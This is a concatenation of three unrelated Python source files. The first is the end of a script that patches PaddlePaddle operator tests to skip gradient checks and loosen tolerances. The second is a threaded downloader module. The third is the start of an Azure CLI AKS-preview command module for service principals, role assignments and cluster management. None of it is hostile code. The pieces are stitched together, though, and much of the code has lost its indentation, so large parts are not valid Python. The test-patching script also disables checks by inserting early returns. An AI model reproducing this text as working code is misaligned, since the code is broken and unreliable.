:param pattern_return: add return
:return:
"""
pattern_1 = re.compile(pattern_import)
pattern_2 = re.compile(pattern_skip)
pattern_3 = re.compile(pattern_return)
file_data = ""
# change file
with open(file, "r", encoding="utf-8") as f:
for line in f:
# add import skip_check_grad_ci
match_obj = pattern_1.search(line)
if match_obj is not None:
line = line[:-1] + ", skip_check_grad_ci\n"
print("### add import skip_check_grad_ci ####")
# add @skip_check_grad_ci
match_obj = pattern_2.search(line)
if match_obj is not None:
file_data += "@skip_check_grad_ci(reason='jetson do n0t neeed this !')\n"
print("### add @skip_check_grad_ci ####")
# delete test_grad_output
match_obj = pattern_3.search(line)
if match_obj is not None:
file_data += line
file_data += get_prefix(line)
file_data += " return\n"
print("### add return for function ####")
continue
file_data += line
# save file
with open(file, "w", encoding="utf-8") as f:
f.write(file_data)
def get_op_list(op_list_file='list_op.txt'):
"""
:param op_list_file: op list file
:return: list of op
"""
op_list = []
with open(op_list_file, "r", encoding="utf-8") as f:
        for line in f:
            # strip the trailing newline so black_list entries actually match
            op = line.strip()
            if op in black_list:
                continue
            op_list.append(op)
return op_list
def set_diff_value(file, atol="1e-5", inplace_atol="1e-7"):
"""
:param file: refer to op_test.py
:param atol: refer to op_test.py
:param inplace_atol:
:return:
"""
os.system("sed -i 's/self.check_output(/self\.check_output\(atol=" + atol +
",inplace_atol=" + inplace_atol + ",/g\' " + file)
def change_op_file(start=0, end=0, op_list_file='list_op.txt', path='.'):
"""
:param start:
:param end:
:param op_list_file: op_list
:param path: just the file in this path
:return:
"""
test_op_list = get_op_list(op_list_file)
file_path = []
for id in range(start, end):
item = test_op_list[id]
print(id, ":", item)
search_file(item + '.py', os.path.abspath(path), file_path)
if len(file_path) == 0:
print("'", item, "' is not a python file!")
continue
file_with_path = file_path[0]
# pattern
pattern_import = ".*import OpTest.*"
pattern_skip = "^class .*\(OpTest\):$"
pattern_return = "def test.*grad.*\):$"
# change file
add_import_skip_return(file_with_path, pattern_import, pattern_skip,
pattern_return)
# op_diff
if item in op_diff_list:
set_diff_value(file_with_path)
file_path.clear()
def run_multi_thread(list_file, thread_num=4):
"""
:param list_file:
:param thread_num:
:return:
"""
length = len(get_op_list(list_file))
thread_list = []
start = 0
end = 0
for item in range(thread_num):
# set argument
start = math.floor(item / thread_num * length)
end = math.floor((item + 1) / thread_num * length)
print("thread num-", item, ":", start, end)
thread = Thread(target=change_op_file, args=(start, end))
thread_list.append(thread)
# start a thread
thread.start()
# wait all thread
for item in thread_list:
item.join()
# add a flag
with open("flag_change_file.txt", "w", encoding="utf-8") as f:
f.write("change successfully!")
print("------change successfully!-------")
def transform_list_to_str(list_op):
"""
:param list_op:
:return:
"""
res = ""
for item in list_op:
tmp = "^" + item + "$|"
res += tmp
return res[:-1]
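# e.g. transform_list_to_str(['test_a', 'test_b']) -> "^test_a$|^test_b$",
# an anchored regex suitable for `ctest -R`.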
def run_file_change(op_list_file):
"""
if file has changed, the file should not be changed again.
:param op_list_file:
:return:
"""
if (os.path.exists("flag_change_file.txt")):
print(
"-----maybe op_file has changed, so don't need to change again------"
)
else:
run_multi_thread(op_list_file)
def run_test_first(op_list_file):
"""
run all op test.
:param op_list_file:
:return:
"""
old_list = get_op_list(op_list_file)
new_list = filter(lambda x: x not in black_list, old_list)
op_test = transform_list_to_str(new_list)
os.system("ctest -R \"(" + op_test + ")\" >& test_op_log.txt")
def run_test_second():
"""
run failed op again.
:return:
"""
os.system(
"sed -n '/(Failed)$/p' test_op_log.txt | awk '{print $3}' >& rerun_op.txt"
)
rerun_list = get_op_list('rerun_op.txt')
if (len(rerun_list)):
print("-------there are " + str(len(rerun_list)) +
" op(s) need to rerun!!!-------")
for failed_op in rerun_list:
os.system("ctest -R \"(" + failed_op + ")\" ")
else:
print("-------all op passed successfully!!!-------")
if __name__ == '__main__':
arg = parse_arguments()
print("------start get op list!------")
os.system("bash " + arg.shell_name + " " + arg.op_list_file)
print("------start change op file!------")
run_file_change(arg.op_list_file)
print("------start run op test first!------")
run_test_first(arg.op_list_file)
print("------start run failed_op test!------")
run_test_second()
print("------do well!------")
|
mod_file.py | import os
from lib import status
from src import video
from src import extract
import threading
import time
#limit max threads
max_threads = 5
#function to register a thread
#wait until a thread slot is available, then start a new thread
def thread_get(FILE, PATH):
while True:
if threading.active_count() <= max_threads:
t = threading.Thread(target=extract.get, args=(FILE, PATH))
t.daemon = True
t.start()
break
else:
time.sleep(0.1)
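# Concurrency is capped by polling threading.active_count(); a
# threading.Semaphore(max_threads) would be the more conventional primitive,
# but the polling loop keeps this module simple and dependency-free.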
def get(FILE, PATH):
if os.path.exists(FILE):
        with open(FILE, 'r') as f:
            line = f.readline()
            while line:
                if len(line) > 1:
                    thread_get(line, PATH)
                line = f.readline()
else:
print("%s File not found" % status.get("error"))
return (-1)
|
custom.py | # pylint: disable=too-many-lines
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import base64
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import re
import ssl
import stat
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
from math import isnan
import colorama # pylint: disable=import-error
import yaml # pylint: disable=import-error
from azure.cli.core.api import get_config_dir
from azure.cli.core.azclierror import (
ArgumentUsageError,
InvalidArgumentValueError,
)
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.commands.client_factory import (
get_mgmt_service_client,
get_subscription_id,
)
from azure.cli.core.util import (
get_file_json,
in_cloud_console,
sdk_no_wait,
shell_safe_json_parse,
)
from azure.graphrbac.models import (
ApplicationCreateParameters,
KeyCredential,
PasswordCredential,
ServicePrincipalCreateParameters,
)
from dateutil.parser import parse # pylint: disable=import-error
from dateutil.relativedelta import relativedelta # pylint: disable=import-error
from knack.log import get_logger
from knack.prompting import NoTTYException, prompt_pass
from knack.util import CLIError
from msrestazure.azure_exceptions import CloudError
from six.moves.urllib.error import URLError # pylint: disable=import-error
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from tabulate import tabulate # pylint: disable=import-error
from azext_aks_preview._client_factory import CUSTOM_MGMT_AKS_PREVIEW
from ._client_factory import (
cf_agent_pools,
cf_container_registry_service,
cf_snapshots_client,
cf_storage,
get_auth_management_client,
get_graph_rbac_management_client,
get_msi_client,
get_resource_by_name,
)
from ._consts import (
ADDONS,
ADDONS_DESCRIPTIONS,
CONST_ACC_SGX_QUOTE_HELPER_ENABLED,
CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME,
CONST_AZURE_POLICY_ADDON_NAME,
CONST_CONFCOM_ADDON_NAME,
CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME,
CONST_INGRESS_APPGW_ADDON_NAME,
CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID,
CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME,
CONST_INGRESS_APPGW_SUBNET_CIDR,
CONST_INGRESS_APPGW_SUBNET_ID,
CONST_INGRESS_APPGW_WATCH_NAMESPACE,
CONST_KUBE_DASHBOARD_ADDON_NAME,
CONST_MANAGED_IDENTITY_OPERATOR_ROLE,
CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID,
CONST_MONITORING_ADDON_NAME,
CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID,
CONST_MONITORING_USING_AAD_MSI_AUTH,
CONST_OPEN_SERVICE_MESH_ADDON_NAME,
CONST_ROTATION_POLL_INTERVAL,
CONST_SCALE_DOWN_MODE_DELETE,
CONST_SCALE_SET_PRIORITY_REGULAR,
CONST_SCALE_SET_PRIORITY_SPOT,
CONST_SECRET_ROTATION_ENABLED,
CONST_SPOT_EVICTION_POLICY_DELETE,
CONST_VIRTUAL_NODE_ADDON_NAME,
CONST_VIRTUAL_NODE_SUBNET_NAME,
)
from ._helpers import (
_trim_fqdn_name_containing_hcp,
)
from ._podidentity import (
_ensure_managed_identity_operator_permission,
_ensure_pod_identity_addon_is_enabled,
_fill_defaults_for_pod_identity_profile,
_update_addon_pod_identity,
)
from ._resourcegroup import get_rg_location
from ._roleassignments import (
add_role_assignment,
build_role_scope,
create_role_assignment,
resolve_object_id,
resolve_role_id,
)
from .addonconfiguration import (
add_ingress_appgw_addon_role_assignment,
add_monitoring_role_assignment,
add_virtual_node_role_assignment,
enable_addons,
ensure_container_insights_for_monitoring,
ensure_default_log_analytics_workspace_for_monitoring,
sanitize_loganalytics_ws_resource_id,
)
from .maintenanceconfiguration import (
aks_maintenanceconfiguration_update_internal,
)
from .vendored_sdks.azure_mgmt_preview_aks.v2021_11_01_preview.models import (
AgentPool,
AgentPoolUpgradeSettings,
ContainerServiceStorageProfileTypes,
CreationData,
KubeletConfig,
LinuxOSConfig,
ManagedClusterAddonProfile,
ManagedClusterHTTPProxyConfig,
ManagedClusterPodIdentity,
ManagedClusterPodIdentityException,
PowerState,
Snapshot,
SysctlConfig,
UserAssignedIdentity,
)
logger = get_logger(__name__)
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
    t = threading.Thread(target=wait_then_open, args=(url,))
t.daemon = True
t.start()
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
# added in python 2.7.13 and 3.6
return ssl.SSLContext(ssl.PROTOCOL_TLS)
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal',
value=0.1 * x, total_val=1.0)
try:
create_service_principal(
cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False
hook.add(message='Finished service principal creation',
value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
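# Illustrative: with the default delay=2, the retry sleeps grow linearly
# (2, 4, 6, ... seconds over up to 10 attempts), giving AAD time to propagate
# the deletion before the helper gives up and returns False.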
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub(
'[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
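# Illustrative (inputs hypothetical): name "My Cluster!", resource group "prod-rg"
# and subscription "1234567890..." yield "MyCluster-prod-rg-123456": non-alphanumerics
# are stripped, the name and group parts are truncated to 10 and 16 characters, and
# the first 6 characters of the subscription id provide uniqueness.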
# pylint: disable=too-many-locals
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password=password, key_value=key_value, key_type=key_type,
key_usage=key_usage, start_date=start_date, end_date=end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds)
try:
return client.create(app_create_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError(
'specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
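# Illustrative: password and key_value are mutually exclusive. Passing password="..."
# yields ([PasswordCredential(...)], None), while passing key_value yields
# (None, [KeyCredential(...)]); both default to a one-year validity window starting now.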
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(
filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
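# A sketch of the resolution order above (identifiers hypothetical): a GUID such as
# "11111111-2222-3333-4444-555555555555" is looked up as an appId; a non-GUID such as
# "http://myapp" is matched against identifierUris; if the query returns nothing, the
# identifier is treated as an application object id and fetched directly.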
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError(
'When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
    if not any([ids, assignee, role, resource_group_name, scope, yes]):
from knack.prompting import prompt_y_n
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
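# Illustrative: _get_role_property reads a property uniformly from SDK models and
# plain dicts, e.g. _get_role_property({'scope': '/subscriptions/xxx'}, 'scope') and
# _get_role_property(assignment_model, 'scope') both return the scope string.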
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
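# Illustrative: role_definition_id is a full ARM path ending in the role GUID, e.g.
# ".../providers/Microsoft.Authorization/roleDefinitions/4d97b98b-...", so endswith()
# on the Network Contributor GUID identifies the role regardless of subscription scope.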
_re_user_assigned_identity_resource_id = re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)',
flags=re.IGNORECASE)
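# Illustrative (IDs hypothetical): the pattern captures three groups from
# "/subscriptions/<sub>/resourcegroups/<rg>/providers/microsoft.managedidentity/userassignedidentities/<name>":
# the subscription id, the resource group and the identity name, matched case-insensitively.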
def _get_user_assigned_identity(cli_ctx, resource_id):
resource_id = resource_id.lower()
match = _re_user_assigned_identity_resource_id.search(resource_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
identity_name = match.group(3)
msi_client = get_msi_client(cli_ctx, subscription_id)
try:
identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
resource_name=identity_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("Identity {} not found.".format(resource_id))
raise CLIError(ex.message)
return identity
raise CLIError(
"Cannot parse identity name from provided resource id {}.".format(resource_id))
_re_snapshot_resource_id = re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.containerservice/snapshots/(.*)',
flags=re.IGNORECASE)
def _get_snapshot(cli_ctx, snapshot_id):
snapshot_id = snapshot_id.lower()
match = _re_snapshot_resource_id.search(snapshot_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
snapshot_name = match.group(3)
snapshot_client = cf_snapshots_client(cli_ctx, subscription_id=subscription_id)
try:
snapshot = snapshot_client.get(resource_group_name, snapshot_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise InvalidArgumentValueError("Snapshot {} not found.".format(snapshot_id))
raise CLIError(ex.message)
return snapshot
raise InvalidArgumentValueError(
"Cannot parse snapshot name from provided resource id {}.".format(snapshot_id))
def aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=False,
listen_address="127.0.0.1",
listen_port="8001",
):
from azure.cli.command_modules.acs.custom import _aks_browse
return _aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser,
listen_address,
listen_port,
CUSTOM_MGMT_AKS_PREVIEW,
)
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
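# Illustrative: _trim_nodepoolname(None) and _trim_nodepoolname("") both fall back to
# "nodepool1", while a longer name such as "averylongnodepoolname" is truncated to its
# first 12 characters, "averylongnod".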
def aks_maintenanceconfiguration_list(
cmd,
client,
resource_group_name,
cluster_name
):
return client.list_by_managed_cluster(resource_group_name, cluster_name)
def aks_maintenanceconfiguration_show(
cmd,
client,
resource_group_name,
cluster_name,
config_name
):
logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
resource_group_name, cluster_name, config_name)
return client.get(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_delete(
cmd,
client,
resource_group_name,
cluster_name,
config_name
):
logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
resource_group_name, cluster_name, config_name)
return client.delete(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_add(
cmd,
client,
resource_group_name,
cluster_name,
config_name,
config_file,
weekday,
start_hour
):
configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
for config in configs:
if config.name == config_name:
raise CLIError("Maintenance configuration '{}' already exists, please try a different name, "
"use 'aks maintenanceconfiguration list' to get current list of maitenance configurations".format(config_name))
return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
def aks_maintenanceconfiguration_update(
cmd,
client,
resource_group_name,
cluster_name,
config_name,
config_file,
weekday,
start_hour
):
configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
found = False
for config in configs:
if config.name == config_name:
found = True
break
if not found:
raise CLIError("Maintenance configuration '{}' doesn't exist."
"use 'aks maintenanceconfiguration list' to get current list of maitenance configurations".format(config_name))
return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
# pylint: disable=unused-argument,too-many-locals
def aks_create(cmd,
client,
resource_group_name,
name,
ssh_key_value,
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
enable_ahub=False,
kubernetes_version='',
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
enable_vmss=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
os_sku=None,
enable_fips_image=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
pod_cidr=None,
service_cidr=None,
pod_cidrs=None,
service_cidrs=None,
ip_families=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_managed_outbound_ipv6_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
nat_gateway_managed_outbound_ip_count=None,
nat_gateway_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
min_count=None,
max_count=None,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
node_zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
enable_pod_security_policy=False,
node_resource_group=None,
uptime_sla=False,
attach_acr=None,
enable_private_cluster=False,
private_dns_zone=None,
enable_managed_identity=True,
fqdn_subdomain=None,
disable_public_fqdn=False,
api_server_authorized_ip_ranges=None,
aks_custom_headers=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_aad=False,
enable_azure_rbac=False,
aad_admin_group_object_ids=None,
aci_subnet_name=None,
enable_sgxquotehelper=False,
kubelet_config=None,
linux_os_config=None,
http_proxy_config=None,
assign_identity=None,
auto_upgrade_channel=None,
enable_pod_identity=False,
enable_pod_identity_with_kubenet=False,
enable_encryption_at_host=False,
enable_ultra_ssd=False,
edge_zone=None,
enable_secret_rotation=False,
rotation_poll_interval=None,
disable_local_accounts=False,
no_wait=False,
assign_kubelet_identity=None,
workload_runtime=None,
gpu_instance_profile=None,
enable_windows_gmsa=False,
gmsa_dns_server=None,
gmsa_root_domain_name=None,
snapshot_id=None,
enable_oidc_issuer=False,
yes=False):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
from azure.cli.command_modules.acs._consts import DecoratorEarlyExitException
from azure.cli.command_modules.acs.decorator import AKSParamDict
from .decorator import AKSPreviewCreateDecorator
# decorator pattern
aks_create_decorator = AKSPreviewCreateDecorator(
cmd=cmd,
client=client,
raw_parameters=AKSParamDict(raw_parameters),
resource_type=CUSTOM_MGMT_AKS_PREVIEW,
)
try:
# construct mc profile
mc = aks_create_decorator.construct_mc_preview_profile()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to create a real managed cluster
return aks_create_decorator.create_mc_preview(mc)
def aks_update(cmd, # pylint: disable=too-many-statements,too-many-branches,too-many-locals
client,
resource_group_name,
name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None, no_wait=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_managed_outbound_ipv6_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
nat_gateway_managed_outbound_ip_count=None,
nat_gateway_idle_timeout=None,
api_server_authorized_ip_ranges=None,
enable_pod_security_policy=False,
disable_pod_security_policy=False,
attach_acr=None,
detach_acr=None,
uptime_sla=False,
no_uptime_sla=False,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
enable_ahub=False,
disable_ahub=False,
aks_custom_headers=None,
auto_upgrade_channel=None,
enable_managed_identity=False,
assign_identity=None,
enable_pod_identity=False,
enable_pod_identity_with_kubenet=False,
disable_pod_identity=False,
enable_secret_rotation=False,
disable_secret_rotation=False,
rotation_poll_interval=None,
disable_local_accounts=False,
enable_local_accounts=False,
enable_public_fqdn=False,
disable_public_fqdn=False,
yes=False,
tags=None,
nodepool_labels=None,
windows_admin_password=None,
enable_azure_rbac=False,
disable_azure_rbac=False,
enable_windows_gmsa=False,
gmsa_dns_server=None,
gmsa_root_domain_name=None,
enable_oidc_issuer=False):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
from azure.cli.command_modules.acs._consts import DecoratorEarlyExitException
from azure.cli.command_modules.acs.decorator import AKSParamDict
from .decorator import AKSPreviewUpdateDecorator
# decorator pattern
aks_update_decorator = AKSPreviewUpdateDecorator(
cmd=cmd,
client=client,
raw_parameters=AKSParamDict(raw_parameters),
resource_type=CUSTOM_MGMT_AKS_PREVIEW,
)
try:
# update mc profile
mc = aks_update_decorator.update_mc_preview_profile()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to update the real managed cluster
return aks_update_decorator.update_mc_preview(mc)
# pylint: disable=unused-argument
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
    This works around a quirk of the Python SDK's behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
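# Illustrative: if a ManagedCluster comes back with tags=None, _remove_nulls deletes
# the attribute entirely, so the CLI's "to_dict" serialization omits "tags": null from
# the JSON output rather than showing a distracting null field.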
def aks_get_credentials(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
admin=False,
user='clusterUser',
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
overwrite_existing=False,
context_name=None,
public_fqdn=False):
credentialResults = None
serverType = None
if public_fqdn:
serverType = 'public'
if admin:
credentialResults = client.list_cluster_admin_credentials(
resource_group_name, name, serverType)
else:
if user.lower() == 'clusteruser':
credentialResults = client.list_cluster_user_credentials(
resource_group_name, name, serverType)
elif user.lower() == 'clustermonitoringuser':
credentialResults = client.list_cluster_monitoring_user_credentials(
resource_group_name, name, serverType)
else:
raise CLIError("The user is invalid.")
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(
encoding='UTF-8')
_print_or_merge_credentials(
